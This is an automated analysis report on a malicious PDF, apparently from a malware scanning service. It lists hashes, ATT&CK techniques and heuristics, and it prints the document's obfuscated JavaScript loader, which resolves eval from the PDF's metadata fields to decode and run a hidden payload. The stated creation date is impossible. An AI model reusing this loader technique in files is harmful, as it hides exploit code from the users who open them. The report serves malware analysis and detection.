PDF malware analysis — malicious · 76bd4b4678a50d1d

MALICIOUS

PDF

18.0 KB Created: 2011-72-51 03:25:00 Authoring application: String.fromCharCode

MD5: 821d1fbd8ed855105895454c529be124 SHA-1: 63862809ea73c1833654b9fc1c0112c65e6308d6 SHA-256: 76bd4b4678a50d1d4ec9f5cfba6750a112ae40ec510a93af5b64ec405de79032

114 Risk Score

Malware Insights

MITRE ATT&CK

T1059.007 JavaScript T1203 Exploitation for Client Execution T1566.001 Spearphishing Attachment

The PDF file contains embedded JavaScript that is obfuscated using String.fromCharCode and string manipulation. The script appears to download and execute a second-stage payload, indicated by the critical PDF_JS_EXPLOIT_CLUSTER heuristic. The ML classifier also strongly flags this PDF as malicious. No specific family could be identified due to the obfuscation and lack of further indicators.

Machine Learning

Nyx PDF Classifier malicious score 1.0000

Heuristics 3

JavaScript action low 2 related findings PDF_JAVASCRIPT

PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER

PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
Embedded JS stream low PDF_JS

PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

javascript_obj0001_000.js
87098a8fb19b58ec04fdc4a4642d645e37d3fc22a713c4fd4955c357bb62de2d pdf-javascript-stream PDF /JS object 1 at offset 0x45BA 332 bytes

Filename	Kind	Source	Size
`javascript_obj0001_000.js` `87098a8fb19b58ec04fdc4a4642d645e37d3fc22a713c4fd4955c357bb62de2d`	pdf-javascript-stream	PDF /JS object 1 at offset 0x45BA	332 bytes
Preview script First 1,000 lines of the extracted script var w = 4; var rah = this.title.replace(/w/g,'*w,'); rah = rah.replace(/t/g,'2'); rah=rah.substr(0,rah.length-2) + ']'; fha=function(){return this}(); qugvv=fha[this.subject]; gxiih=qugvv(this.producer); bkq = qugvv(rah); var s = ''; for (i = 0; i < bkq.length; i++) { irui = bkq[i]; s += gxiih(irui); } qugvv(s);

Preview script

First 1,000 lines of the extracted script

var w = 4;
var rah = this.title.replace(/w/g,'*w,');
rah = rah.replace(/t/g,'2');
rah=rah.substr(0,rah.length-2) + ']';
fha=function(){return this}();
qugvv=fha[this.subject];
gxiih=qugvv(this.producer);
bkq = qugvv(rah);
var s = '';
for (i = 0; i < bkq.length; i++) {
	irui = bkq[i];
	s += gxiih(irui);
}
qugvv(s);

Open this report in the interactive analyzer, or submit your own file for analysis.